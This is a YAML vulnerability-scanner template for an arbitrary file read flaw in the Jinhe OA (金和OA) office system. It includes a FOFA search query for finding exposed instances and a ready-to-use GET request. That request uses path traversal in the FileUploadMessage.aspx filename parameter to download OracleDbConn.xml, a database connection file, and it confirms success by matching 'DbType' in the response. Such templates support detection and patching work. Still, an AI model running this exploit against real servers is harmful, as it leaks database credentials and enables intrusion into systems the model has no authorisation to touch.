product: 金和OA
vName: 金和OA FileUploadMessage文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: 金和OA系统存在任意文件读取漏洞，攻击者通过恶意构造的请求下载服务器上的任意文件，包括敏感文件、配置文件、数据库文件等。这种漏洞通常存在于Web应用程序中，是由于不正确的输入验证或不安全的文件处理机制导致的。
version: ''
note: ''
search:
  FOFA: app="金和网络-金和OA"
protocol: http
link: https://blog.csdn.net/u010025272/article/details/133985038
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /C6/JHSoft.WCF/FunctionNew/FileUploadMessage.aspx?filename=../../../C6/JhSoft.Web.Dossier.JG/JhSoft.Web.Dossier.JG/XMLFile/OracleDbConn.xml
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - DbType
            logic: and